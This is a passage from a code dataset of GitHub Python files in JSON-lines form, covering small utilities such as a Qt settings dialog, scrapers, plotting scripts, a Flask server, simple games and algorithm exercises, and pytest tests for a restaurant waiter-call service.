self._save_int_cb(\"close_to_tray\", val)\n\n def closeEvent(self, event):\n self.deleteLater()\n self.maincontroller.view.show()\n\n def setColorSchemCombo(self, val):\n name = self.ui.colorSchemComboBox.itemText(val)\n self.settings.setValue(\"color_schem\", name)\n\n\nif __name__ == \"__main__\":\n QtCore.QCoreApplication.setOrganizationName(\"QTodoTxt\")\n QtCore.QCoreApplication.setApplicationName(\"QTodoTxt\")\n app = QtGui.QApplication(sys.argv)\n s = Settings(None)\n s.show()\n sys.exit(app.exec_())\n","repo_name":"QTodoTxt/QTodoTxt","sub_path":"qtodotxt/ui/dialogs/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":5249,"program_lang":"python","lang":"en","doc_type":"code","stars":386,"dataset":"github-code","pt":"66"} +{"seq_id":"39921221133","text":"from config import *\n\n\ndef parser_02(page: str):\n soup = BS(page, 'html.parser')\n cards = soup.find('div', class_='card-common').find_all('section', class_='common-text b-bottom pb-3')\n out_list = []\n for card in cards:\n tmp = list(card.stripped_strings)[0]\n out_list.append(tmp)\n return out_list\n\n\nif __name__ == '__main__':\n change_current_dir()\n pages = load_pages()\n list_ressult = run_parser(parser_02, pages)\n stdout.write(json.dumps(sum(list_ressult, [])))","repo_name":"work-f999145/work_001","sub_path":"multi and aihttp/scripts/parser_02.py","file_name":"parser_02.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"33530179182","text":"from urllib import parse\n\nimport jinja2\nimport pytest\n\nGROUP_CHAT_ID = 1000000\nTABLE_UUID = 'uuid__1'\nTABLE_POS_ID = 'table_id__1'\nCOMMENT = 'Привет, можно мне счёт?'\n\n\ndef telegram_render(context, call_waiter_type: str, **kwargs) -> str:\n templates = (\n context.config.EATS_INTEGRATION_OFFLINE_ORDERS_TELEGRAM_TEMPLATES\n )\n template = templates['call_waiter'][call_waiter_type]\n environment = jinja2.Environment()\n return environment.from_string(template).render(**kwargs)\n\n\n@pytest.mark.parametrize(\n ('params', 'result_kwargs'),\n (\n ({'uuid': TABLE_UUID}, {'table': TABLE_POS_ID}),\n (\n {'uuid': TABLE_UUID, 'call_waiter_type': 'call'},\n {'table': TABLE_POS_ID},\n ),\n (\n {'uuid': TABLE_UUID, 'call_waiter_type': 'cash_payment'},\n {'table': TABLE_POS_ID},\n ),\n (\n {'uuid': TABLE_UUID, 'comment': COMMENT},\n {'table': TABLE_POS_ID, 'comment': COMMENT},\n ),\n (\n {\n 'uuid': TABLE_UUID,\n 'comment': COMMENT,\n 'call_waiter_type': 'call',\n },\n {'table': TABLE_POS_ID, 'comment': COMMENT},\n ),\n (\n {\n 'uuid': TABLE_UUID,\n 'comment': COMMENT,\n 'call_waiter_type': 'cash_payment',\n },\n {'table': TABLE_POS_ID, 'comment': COMMENT},\n ),\n ),\n)\n@pytest.mark.pgsql(\n 'eats_integration_offline_orders',\n files=['db.sql', 'restaurant_options_all_enabled.sql'],\n)\n@pytest.mark.config(\n EI_OFFLINE_ORDERS_PAY_METHOD_SETTINGS={'include_cash': False},\n)\nasync def test_call_waiter_telegram(\n web_context,\n web_app_client,\n mockserver,\n patch,\n params: dict,\n result_kwargs: dict,\n):\n @patch('aiogram.bot.api.Methods.api_url')\n def _api_url(token, method):\n return '$mockserver/telegram/bot{token}/{method}'.format(\n token=token, method=method,\n )\n\n @mockserver.json_handler(\n '/telegram/bot123456:ABC-DEF1234aaaaa-zyx11A1a1a111aa11/sendMessage',\n )\n def telegram_send_message(request):\n kwargs = parse.parse_qs(request.get_data().decode())\n assert str(GROUP_CHAT_ID) == kwargs['chat_id'][0]\n text = telegram_render(\n 
web_context,\n params.get('call_waiter_type', 'call'),\n **result_kwargs,\n )\n assert text == kwargs['text'][0]\n return {'ok': True, 'result': {}}\n\n response = await web_app_client.post(f'/v1/call-waiter', params=params)\n assert response.status == 200\n assert telegram_send_message.times_called == 1\n\n\n@pytest.mark.pgsql(\n 'eats_integration_offline_orders',\n files=['db.sql', 'restaurant_options_no_payment_offline.sql'],\n)\n@pytest.mark.config(\n EI_OFFLINE_ORDERS_PAY_METHOD_SETTINGS={'include_cash': True},\n)\nasync def test_call_waiter_offline_payment(\n taxi_eats_integration_offline_orders_web, pgsql,\n):\n params = {\n 'uuid': TABLE_UUID,\n 'comment': COMMENT,\n 'call_waiter_type': 'cash_payment',\n }\n\n response = await taxi_eats_integration_offline_orders_web.post(\n f'/v1/call-waiter', params=params,\n )\n assert response.status == 400\n\n\nDEFAULT_PLACE_ID = '3fa85f64-5717-4562-b3fc-2c963f66afa6'\nDEFAULT_WAITER_ID = '1965cdbe-cac1-44ba-9355-d5da6fd87009'\n\n\n@pytest.mark.config(\n EATS_INTEGRATION_OFFLINE_ORDERS_IIKO_WAITER={'host': '$mockserver'},\n)\n@pytest.mark.pgsql(\n 'eats_integration_offline_orders', files=['db.sql', 'db_iiko_waiter.sql'],\n)\nasync def test_call_iiko_waiter(web_app_client, mockserver):\n @mockserver.handler('/api/v1/notifications/mobile/waiter-call')\n def _get_test_call_waiter(request):\n assert request.json['userId'] == DEFAULT_WAITER_ID\n return mockserver.make_response('', status=202)\n\n response = await web_app_client.post(\n f'/v1/call-waiter?uuid={DEFAULT_PLACE_ID}'\n f'&waiter_id={DEFAULT_WAITER_ID}',\n )\n assert response.status == 200\n","repo_name":"Alexander-Berg/2022-tests-examples-2","sub_path":"Taxi/test_eats_integration_offline_orders/web/test_call_waiter.py","file_name":"test_call_waiter.py","file_ext":"py","file_size_in_byte":4100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"6815923611","text":"import csv\nwith open(\"./Mappa-delle-tabaccherie-in-Italia.csv\", newline=\"\", encoding=\"ISO-8859-1\") as filecsv:\n lettore = csv.reader(filecsv,delimiter=\";\")\n header = next(lettore)\n print(header)\n Anno = input('Enter the year the tobacco shop was added: ')\n dati = [(riga[0], riga[1], riga[2], riga[3], riga[4], riga[5], riga[6], riga[7], riga[8]) for riga in lettore if riga[4] == Anno]\n for tabaccheria in dati:\n print(f\"\"\"\n {tabaccheria[0]},{tabaccheria[1]} \n -- Coordinates: {tabaccheria[8]},{tabaccheria[7]}\n \"\"\")\n","repo_name":"dado75/ProgrammoInPython","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"16036321016","text":"from __future__ import division\nimport matplotlib\n#matplotlib.use('Agg') # Can also use 'tkagg' or 'webagg'\n#from plot_neb_tio2 import *\nfrom matplotlib.offsetbox import TextArea, VPacker, AnnotationBbox\nimport matplotlib.patches as patches\nfrom math import ceil, floor\nimport matplotlib.pyplot as plt\nfrom ase.io import read, write\nfrom ase.visualize import view\nimport matplotlib.patches as mpatches\nfrom ase.data.colors import jmol_colors\nfrom decimal import Decimal \nfrom pylab import *\nfrom ase.data import covalent_radii as aradii\nfrom matplotlib.patches import Circle\nfrom math import atan2,pi\nimport matplotlib.gridspec as gridspec\n\nmatplotlib.rc('xtick', labelsize=14)\nmatplotlib.rc('ytick', labelsize=14)\n\n\n\ndef plot_atoms(ax, atoms, xyz, acols, alp, 
z):\n\n ecols = [[0, 0, 0] for col in atoms]\n\n indices = range(len(atoms))\n for ia in indices:\n acol = acols[ia]\n ecol = ecols[ia]\n arad = aradii[atoms[ia].number] \n apos = atoms[ia].position\n eps = arad\n\n circ = Circle([apos[xyz[0]], apos[xyz[1]]],\n fc = acol,\n ec = ecol,\n radius = arad,\n lw = 0.5,\n # alpha = alp[ia],\n #zorder = 1 - apos[1]/1000\n zorder =1.0\n )\n ax.add_patch(circ)\n\n\n\ndef plot_conf(ax, atoms, colorlenth,rot=False):\n colors = np.array([jmol_colors[atom.number] for atom in atoms])\n positions =atoms.get_positions()\n for i, atom in enumerate(atoms):\n if (positions[i,0]<=12.5 or positions[i,0]>=24.75):\n colors[i] =[255/255, 255/255, 255/255]\n\n alp = [None] * colors.shape[0]\n #for i,a in enumerate(atoms):\n # if a.symbol == 'Al' or a.symbol == 'O':\n # if a.position[2] < 9.7:\n # alp[i] = 1.0\n\n if rot:\n # atoms.rotate('x',pi/2)\n atoms.rotate('y',np.radians(-90),rotate_cell=True)\n atoms.rotate('z',np.radians(-90),rotate_cell=True)\n\n plot_atoms(ax, atoms, [0,2,1], colors, alp, z=-1)\n\n#-----------------------------------------------------------#\nfig = plt.figure(figsize=(6.0,5))\nouter = gridspec.GridSpec(1, 1, wspace=0.04, hspace=0.2)\n\ncolor_lib = ['#00FF00','#377eb8','#4daf4a','#00FFFF','#a65628','#FF0000','#0000FF', '#FF00FF','#FFFF00','#000000']\n#---------------------- Pt7 clusters -------------------------------------#\ndata=read(sys.argv[1]+'@:')\nfor j in range(0,len(data)):\n #inner = gridspec.GridSpecFromSubplotSpec(2, 1,subplot_spec=outer[j], wspace=0.00, hspace=0.0, height_ratios=[6.86,9.9])\n atoms = data[j]\n colorlenth = len(atoms)\n atoms =atoms*(1,3,1)\n print(colorlenth)\n # write('newimage.traj',atoms)\n a=atoms\n #view(atoms)\n del atoms[atoms.positions[:,1] <=6.0]\n del atoms[atoms.positions[:,1] >=28.0]\n #view(atoms)\n colorlenth = len(atoms)\n cell = atoms.get_cell()\n # 0 0\n ax = plt.Subplot(fig, outer[0])\n img = atoms.copy()\n plot_conf(ax, img,colorlenth,rot=False)\n\n #ax.set_xlim([0.20, 0.60])\n #ax.set_ylim([0.0, 20.0])\n ax.set_yticks([])\n ax.set_xticks([])\n ax.set(aspect=1)\n fig.add_subplot(ax)\n #----------------- drawing box -------------------------------#\n xlim = ax.get_xlim()\n ylim = ax.get_ylim()\n print(xlim)\n print(ylim)\n box_x = [xlim[0], xlim[1], xlim[1], xlim[0], xlim[0]]\n box_y =[ylim[0], ylim[0], ylim[1], ylim[1], ylim[0]]\n ax.add_patch(\n patches.Rectangle(\n (box_x[0],box_y[0]),\n xlim[1]-xlim[0],\n ylim[1]-ylim[0],\n fill=True,facecolor='white', clip_on=False,zorder =0.8) )\n ax.plot(box_x, box_y, color='blue',linewidth=5.0)\n\nname = sys.argv[2]\nname =name\nsavefig(name,bbox_inches='tight')\nshow()\nexit()\n","repo_name":"sivachiriki/GOFEE_Pt_V_supported","sub_path":"Platinum_clusters_Project/Al2O3_0001surface_used/Ptoxides_zorderimage_new.py","file_name":"Ptoxides_zorderimage_new.py","file_ext":"py","file_size_in_byte":3784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"32724230976","text":"\"\"\"\nThis is a simple flask server\nthat handles requests from the frontend\n\"\"\"\nimport os\nfrom flask import Flask, send_from_directory\nfrom vaccFunctions import VaccFunctions\n\nCURRENT_DIR = os.path.dirname(__file__)\nclient_folder = CURRENT_DIR + '/../client/build/'\napp = Flask(__name__, static_folder=client_folder)\n\n# account for imported request handlers\napp.register_blueprint(VaccFunctions)\n\n# Serve React App\n@app.route('/', defaults={'path': ''})\n@app.route('/')\ndef serve(path):\n if path != \"\" and 
os.path.exists(client_folder + path):\n return send_from_directory(client_folder, path)\n else:\n return send_from_directory(client_folder, 'index.html')\n\n\nif __name__ == '__main__':\n app.run(use_reloader=True, port=5000, threaded=True)\n","repo_name":"SarthakHa/VaccineGuidecuHacking","sub_path":"server/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"70306653971","text":"__author__ = \"Tsh\"\n\nfrom MestVanlig import MestVanlig\nfrom Tilfeldig import Tilfeldig\nfrom Sekvensiell import Sekvensiell\nfrom Aksjon import Aksjon\nfrom Historiker import Historiker\n\nclass MangeSpill(object):\n\n poeng = {\"vinner\": 1, \"taper\": 0, \"uavgjort\": 0.5}\n\n def __init__(self, spiller1, spiller2, antall_spill):\n self.spiller1 = spiller1\n self.spiller2 = spiller2\n self.antall_spill = antall_spill\n\n def arranger_enkeltspill(self):\n spiller1_aksjon = self.spiller1.velg_aksjon()\n spiller2_aksjon = self.spiller2.velg_aksjon()\n\n spiller1_aksjonliste = {\"you\": spiller1_aksjon, \"enemy\": spiller2_aksjon}\n spiller2_aksjonliste = {\"you\": spiller2_aksjon, \"enemy\": spiller1_aksjon}\n\n if spiller1_aksjon > spiller2_aksjon:\n self.spiller1.motta_resultat(spiller1_aksjonliste, self.poeng[\"vinner\"])\n self.spiller2.motta_resultat(spiller2_aksjonliste, self.poeng[\"taper\"])\n return \"{spiller1}: {aksjon1} {spiller2}: {aksjon2} -> {spiller1} vant\".format(\n spiller1=self.spiller1.oppgi_navn(),\n spiller2=self.spiller2.oppgi_navn(),\n aksjon1=str(spiller1_aksjon),\n aksjon2=str(spiller2_aksjon),\n )\n\n elif spiller2_aksjon > spiller1_aksjon:\n self.spiller1.motta_resultat(spiller1_aksjonliste, self.poeng[\"taper\"])\n self.spiller2.motta_resultat(spiller2_aksjonliste, self.poeng[\"vinner\"])\n return \"{spiller1}: {aksjon1} {spiller2}: {aksjon2} -> {spiller2} vant\".format(\n spiller1=self.spiller1.oppgi_navn(),\n spiller2=self.spiller2.oppgi_navn(),\n aksjon1=str(spiller1_aksjon),\n aksjon2=str(spiller2_aksjon),\n )\n\n else:\n self.spiller1.motta_resultat(spiller1_aksjonliste, self.poeng[\"uavgjort\"])\n self.spiller2.motta_resultat(spiller2_aksjonliste, self.poeng[\"uavgjort\"])\n return \"{spiller1}: {aksjon1} {spiller2}: {aksjon2} -> Uavgjort\".format(\n spiller1=self.spiller1.oppgi_navn(),\n spiller2=self.spiller2.oppgi_navn(),\n aksjon1=str(spiller1_aksjon),\n aksjon2=str(spiller2_aksjon),\n )\n\n def arranger_turnering(self):\n for i in range(self.antall_spill):\n print(self.arranger_enkeltspill())\n print(self.spiller1.oppgi_navn() + \" fikk: \" + str(self.spiller1.poeng))\n print(self.spiller2.oppgi_navn() + \" fikk: \" + str(self.spiller2.poeng))\n\nif __name__ == \"__main__\":\n ms = MangeSpill(Sekvensiell(), Historiker(2), 10)\n ms.arranger_turnering()","repo_name":"trondhumbor/Plab2","sub_path":"RockScissorPaper/MangeSpill.py","file_name":"MangeSpill.py","file_ext":"py","file_size_in_byte":2665,"program_lang":"python","lang":"no","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"33565009305","text":"from os import path\n\n# TYPING\nfrom typing import List\nfrom datatypes import Matrix, GeneticSolution, GreedySolution\n\n# GENETIC ALGORITHM\nfrom genetic_algorithm.genetic_algorithm import GeneticAlgorithm\nfrom genetic_algorithm.functions import *\n\n# GREEDY ALGORITHM\nfrom greedy.greedy import Greedy\n\n# UTILS\nimport utils\n\n\ndef running_ga_instance(\n distances: Matrix[int],\n optimum: List[int]) -> 
GeneticSolution:\n number_generations: int = 300\n population_size: int = 500\n crossover_rate: float = 0.3\n mutation_rate: float = 0.1\n number_parents: int = 200\n number_mutations: int = 6\n verbose: bool = True\n minimum_fitness: int = fitness(optimum[:-1], distances)\n\n solver: GeneticAlgorithm = GeneticAlgorithm(\n distances, optimum, selection_function=select_parents,\n crossover_function=single_point_crossover, mutation_function=mutate,\n fitness_function=fitness,\n generation_function=generate_population)\n\n solution, profit, history = solver(\n number_generations, population_size, crossover_rate, mutation_rate,\n number_parents, number_mutations, minimum_fitness, verbose)\n\n return solution, profit, history\n\n\ndef running_greedy_instance(distances: Matrix[int]) -> GreedySolution:\n greedy = Greedy(distances)\n\n solution, profit = greedy()\n\n return solution, profit\n\n\ndef main():\n distances_file_path: str = path.join(\"dataset\", \"distances.txt\")\n optimum_file_path: str = path.join(\"dataset\", \"optimum.txt\")\n xy_file_path: str = path.join(\"dataset\", \"xy.txt\")\n\n distances, optimum, xy = utils.get_dataset(\n distances_file_path, optimum_file_path, xy_file_path)\n\n # solution, profit, history = running_ga_instance(distances, optimum)\n solution, profit = running_greedy_instance(distances)\n\n print(f\"solution is {solution} with profit {profit}\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"mohamedfouadhanani/travelling-salesman-problem","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"28187981753","text":"# -*- coding: utf-8 -*-\r\nimport cv2\r\nimport numpy as np\r\nimport math\r\nimport time\r\nimport matplotlib.pyplot as plt\r\nfrom numba import jit\r\n\r\n@jit\r\ndef main():\r\n img = cv2.imread(\"code5.bmp\")\r\n imh, imw, imc = img.shape\r\n \r\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n gyh, gyw = gray.shape\r\n \r\n list = range(0,256)\r\n\r\n plt.figure(1)\r\n plt.subplot(1,2,1)\r\n plt.imshow(gray,'gray',vmin=0,vmax=255)\r\n \r\n plt.subplot(1,2,2) \r\n hist = cv2.calcHist([gray],[0],None,[256],[0,256])\r\n plt.bar(np.arange(0,256), hist[:,0], color='k', width=1.0)\r\n plt.xlim([0,255])\r\n\r\n c = ['b','g','r']\r\n for i in range(3):\r\n hist =cv2.calcHist([img],[i],None,[256],[0,256])\r\n plt.plot(np.arange(0,256), hist[:,0], color=c[i])\r\n plt.xlim([0,255])\r\n\r\n plt.savefig(\"code3.1.jpg\")\r\n plt.show()\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"e1b16079/datebank","sub_path":"基礎演習/画像処理/一日目/program13.py","file_name":"program13.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"4768632005","text":"#!/usr/bin/python3\n\"\"\"\nqueries the Reddit API\n\"\"\"\nimport requests\nfrom collections import defaultdict\n\n\ndef count_words(subreddit, word_list, after=None, counts=None):\n \"\"\"\n queries the Reddit API, parses the title of all hot articles\n and prints a sorted count of given keywords\n \"\"\"\n if after is None:\n url = \"https://www.reddit.com/r/{}/hot.json?limit=100\".format(\n subreddit)\n else:\n url = \"https://www.reddit.com/r/{}/hot.json?limit=100&after={}\".format(\n subreddit, after)\n\n if counts is None:\n counts = defaultdict(int)\n\n headers = {'User-Agent': 'chris'}\n response = requests.get(url, headers=headers, 
allow_redirects=False)\n if response.status_code == 200:\n data = response.json()\n posts = data['data']['children']\n for post in posts:\n title = post['data']['title'].lower()\n t = \" {} \".format(title)\n\n for word in word_list:\n w = \" {} \".format(word.lower())\n if w in t:\n counts[word.lower()] += 1\n\n after = data['data']['after']\n if after:\n return count_words(subreddit, word_list, after, counts)\n\n sorted_counts = sorted(counts.items(),\n key=lambda item: (-item[1], item[0]))\n\n for word, count in sorted_counts:\n print(f\"{word}: {count}\")\n else:\n return None\n","repo_name":"sakachris/alx-system_engineering-devops","sub_path":"0x16-api_advanced/100-count.py","file_name":"100-count.py","file_ext":"py","file_size_in_byte":1440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"42009365838","text":"import torch\nimport dgl\nimport numpy as np\nimport random\nfrom sklearn.metrics import roc_auc_score, accuracy_score\n\ndef split_data(hg, etype_name, train_ratio, eval_ratio, test_ratio):\n src, dst = hg.edges(etype=etype_name)\n etype_src = src.numpy().tolist()\n etype_dst = dst.numpy().tolist()\n \n num_link = len(etype_src)\n\n pos_label=[1]*num_link\n pos_data=list(zip(etype_src, etype_dst, pos_label))\n\n etype_adj = np.array(hg.adj(etype=etype_name).to_dense())\n full_idx = np.where(etype_adj==0)\n\n sample = random.sample(range(0, len(full_idx[0])), num_link)\n neg_label = [0]*num_link\n neg_data = list(zip(full_idx[0][sample],full_idx[1][sample], neg_label))\n \n full_data = pos_data + neg_data\n random.shuffle(full_data)\n\n train_size = int(len(full_data) * train_ratio)\n eval_size = int(len(full_data) * eval_ratio)\n test_size = len(full_data) - train_size - eval_size\n \n train_data = full_data[:train_size]\n eval_data = full_data[train_size : train_size+eval_size]\n test_data = full_data[train_size+eval_size : train_size+eval_size+test_size]\n train_data = np.array(train_data)\n eval_data = np.array(eval_data)\n test_data = np.array(test_data)\n \n return train_data, eval_data, test_data\n\ndef evaluate_auc(pred, label):\n res=roc_auc_score(y_score=pred, y_true=label)\n return res\n\ndef evaluate_acc(pred, label):\n res = []\n for _value in pred:\n if _value >= 0.5:\n res.append(1)\n else:\n res.append(0)\n return accuracy_score(y_pred=res, y_true=label)","repo_name":"CLIS-237/test_ELG","sub_path":"Link_Prediction/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"20269313009","text":"# https://leetcode.com/problems/valid-palindrome/\n# Solution 1\ndef isPalindrome(self, s: str) -> bool:\n s = s.lower()\n preprocessing = []\n for ch in s:\n if 48 <= ord(ch) <= 57 or 97 <= ord(ch) <= 122:\n preprocessing.append(ch)\n\n # Now, check it!!\n i, j = 0, len(preprocessing)-1\n while i < j:\n if preprocessing[i] != preprocessing[j]:\n return False\n j -= 1\n i += 1\n return True\n# Solution 2\n\n\ndef isPalindrome(s: str) -> bool:\n i, j = 0, len(s) - 1\n while i < j:\n while i < j and not isAlphaNum(s[i]):\n i += 1\n while i < j and not isAlphaNum(s[j]):\n j -= 1\n if s[i].lower() != s[j].lower():\n return False\n i, j = i + 1, j - 1\n return True\n\n# Could write own alpha-numeric function\n\n\ndef isAlphaNum(c):\n return (\n ord(\"A\") <= ord(c) <= ord(\"Z\")\n or ord(\"a\") <= ord(c) <= ord(\"z\")\n or ord(\"0\") <= ord(c) <= 
ord(\"9\"))\n","repo_name":"mchi11/160Question","sub_path":"twoPointers/validPalind.py","file_name":"validPalind.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"17628776802","text":"#!/usr/bin/env python3\n\"\"\"calculates the integral of a polynomial\"\"\"\n\n\ndef poly_integral(poly, C=0):\n \"\"\"calculates integral of a poly\n Args\n poly (list): polynomial list\n C (int): representing the integration constant\n Returns\n (list): list of coefficients\n \"\"\"\n if not all(type(C) in (float, int) for c in poly) or type(C) is not int:\n return None\n integral = [c/a if c % a != 0 else c//a for a, c in enumerate(poly, 1)]\n while len(integral) > 0 and integral[-1] == 0:\n integral.pop()\n return [C] + integral\n","repo_name":"s0m35h1t/holbertonschool-machine_learning","sub_path":"math/0x02-calculus/17-integrate.py","file_name":"17-integrate.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"9934392330","text":"from tkinter import *\n\nroot = Tk()\n\nroot.title(\"Feet to Centimeter Convertor\")\nroot.geometry(\"350x280\")\nroot.resizable(height=False, width=False)\n\n\ndef convert_to_cm():\n ft_input = float(ft_entry.get())\n centi = ft_input * 30.48\n cm_value.set(\"%.4f\" % centi)\n\n\ndef convert_to_ft():\n cm_input = float(cm_entry.get())\n feet = cm_input / 30.48\n ft_value.set(\"%.4f\" % feet)\n\n\ndef clear():\n cm_value.set(\"\")\n ft_value.set(\"\")\n\n\n# Widgets for feet\nft_label = Label(root, text=\"Feet\", bg=\"#D7CACA\", width=14)\nft_label.grid(row=0, column=2)\n\nft_value = DoubleVar()\nft_entry = Entry(root, textvariable=ft_value, width=14)\nft_entry.grid(row=0, column=0, padx=35, pady=40)\nft_entry.delete(0, 'end')\n\n# Widgets for cm\ncm_label = Label(root, text=\"Centimeter\", width=14, bg=\"#D7CACA\")\ncm_label.grid(row=1, column=2)\n\ncm_value = DoubleVar()\ncm_entry = Entry(root, textvariable=cm_value, width=14)\ncm_entry.grid(row=1, column=0)\ncm_entry.delete(0, 'end')\n\n# Widget for convert and clear\nto_convert_ft = Button(root, text=\"Convert to CM\", bg=\"blue\", command=convert_to_cm)\nto_convert_ft.grid(row=3, column=0, padx=25, pady=30)\n\nto_convert_cm = Button(root, text=\"Convert to Feet\", bg=\"blue\", command=convert_to_ft)\nto_convert_cm.grid(row=3, column=2)\n\nto_clear = Button(root, text=\"Clear\", bg=\"blue\", command=clear)\nto_clear.grid(row=4, column=0)\n\nunit_value = Label(root, text=\"1 feet = 30.48 Cm\")\nunit_value.grid(row=4, column=2)\n\nroot.mainloop()\n","repo_name":"karuna-sth/Python-Programs","sub_path":"GUI Applications/feetToCentimeter.py","file_name":"feetToCentimeter.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"41643611846","text":"#!/usr/bin/python3\n\nimport re\n\nrandStr = \"12345 12345-1234 1234 12346-333\"\n# Match 5 digit codes or 5 digits with a hyphen, then 4 digits\nregex = re.compile(r\"(\\d{5}|\\d{5}-\\d{4})\\s\")\nmatches = re.findall(regex, randStr)\n\nfor i in matches:\n print(i)\n","repo_name":"OgagaOnuta/Dust","sub_path":"Python/Derek_Banas-Learn_to_Program/x180.py","file_name":"x180.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"13873394235","text":"import requests\nfrom bs4 import 
BeautifulSoup as bs\n\n\nclass User:\n \"\"\"\n First, create an object of class `User`\n ```python\n user1 = User(id=\"heltion\")\n ```\n | Methods | Details |\n | --------------- | ---------------------------------------------------------------- |\n | `get_profile()` | Returns name, username, profile_image_link, rating, details etc. |\n \"\"\"\n\n def __init__(self, id):\n self.id = id\n\n def get_profile(self):\n \"\"\"\n Create an object of the 'User' class\\n\n ```python\n user1 = User(id=\"heltion\")\n user1.get_profile()\n ```\n Response\n ```js\n {\n 'name': 'Yaowei Lyu',\n 'username': 'heltion',\n 'profile_image_link': 'https://cdn.codechef.com/sites/all/themes/abessive/images/user_default_thumb.jpg',\n 'rating':\n {\n 'star': '7★',\n 'current_rating': '2555',\n 'division': '1',\n 'highest_rating': '2555',\n 'global_rank': '72',\n 'country_rank': '8'\n },\n 'details':\n {\n 'country_flag_link': 'https://cdn.codechef.com/download/flags/24/cn.png',\n 'country_name': 'China',\n 'user_type': 'Student',\n 'institution': 'Zhejiang University China'\n }\n }\n ```\n \"\"\"\n try:\n url = f\"https://www.codechef.com/users/{self.id}\"\n headers = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 6.3; Win 64 ; x64) Apple WeKit /537.36(KHTML , like Gecko) Chrome/80.0.3987.162 Safari/537.36\"\n }\n response = requests.get(url, headers=headers).text\n soup = bs(response, \"lxml\")\n\n user_details_box = soup.find(\"div\", {\"class\": \"user-details-container\"})\n header_box = user_details_box.find(\"header\")\n profile_image_link = header_box.find(\"img\")[\"src\"]\n profile_name = header_box.find(\"h1\").text.strip()\n profile_details_box = user_details_box.find(\"section\")\n profile_details_ul = profile_details_box.find(\"ul\")\n profile_details_li = profile_details_ul.find_all(\"li\")\n\n # star\n profile_star = (\n profile_details_li[0].find(\"span\", {\"class\": \"rating\"}).text.strip()\n )\n # Username\n profile_username = (\n profile_details_li[0]\n .find(\"span\", {\"class\": \"m-username--link\"})\n .text.strip()\n )\n # Country\n country_flag_link = profile_details_li[1].find(\n \"img\", {\"class\": \"user-country-flag\"}\n )[\"src\"]\n country_name = (\n profile_details_li[1]\n .find(\"span\", {\"class\": \"user-country-name\"})\n .text.strip()\n )\n # User Type\n user_type = profile_details_li[2].find(\"span\").text.strip()\n # Institution\n institution = profile_details_li[3].find(\"span\").text.strip()\n\n profile_rating_box = soup.find(\n \"aside\", {\"class\": \"sidebar small-4 columns pr0\"}\n )\n\n # Current Rating\n rating_box = profile_rating_box.find(\"div\", {\"class\": \"rating-header\"})\n rating_divs = rating_box.find_all(\"div\")\n current_rating = rating_divs[0].text.strip()\n # Division\n division = (\n rating_divs[1]\n .text.strip()\n .replace(\"(\", \"\")\n .replace(\")\", \"\")\n .replace(\"Div \", \"\")\n )\n # Highest Rating\n highest_rating = (\n rating_box.find(\"small\")\n .text.strip()\n .replace(\"(Highest Rating \", \"\")\n .replace(\")\", \"\")\n )\n\n # Ranks\n ranks_box = profile_rating_box.find(\"div\", {\"class\": \"rating-ranks\"})\n ranks_list = ranks_box.find_all(\"strong\")\n global_rank = ranks_list[0].text.strip()\n country_rank = ranks_list[1].text.strip()\n\n profile_data = {\n \"name\": profile_name,\n \"username\": profile_username,\n \"profile_image_link\": profile_image_link,\n \"rating\": {\n \"star\": profile_star,\n \"current_rating\": current_rating,\n \"division\": division,\n \"highest_rating\": highest_rating,\n \"global_rank\": 
global_rank,\n \"country_rank\": country_rank,\n },\n \"details\": {\n \"country_flag_link\": country_flag_link,\n \"country_name\": country_name,\n \"user_type\": user_type,\n \"institution\": institution,\n },\n }\n return profile_data\n except:\n return None\n","repo_name":"Clueless-Community/scrape-up","sub_path":"src/scrape_up/codechef/codechef.py","file_name":"codechef.py","file_ext":"py","file_size_in_byte":5182,"program_lang":"python","lang":"en","doc_type":"code","stars":136,"dataset":"github-code","pt":"66"} +{"seq_id":"86853602213","text":"import datetime\nimport unittest\n\nfrom zenpy.lib import exception\nfrom zenpy.lib.api_objects import Ticket\nfrom zenpy.lib.api_objects import User as ZendeskUser\n\nfrom help_desk_client.interfaces import (\n HelpDeskComment,\n HelpDeskCustomField,\n HelpDeskException,\n HelpDeskTicket,\n HelpDeskTicketNotFoundException,\n HelpDeskUser,\n Priority,\n Status,\n TicketType,\n)\nfrom help_desk_client.zendesk_manager import ZendeskManager\n\n\nclass FakeUser(object):\n def __init__(self, *args, **kwargs):\n self.id = kwargs.get(\"id\")\n self.name = kwargs.get(\"name\")\n self.email = 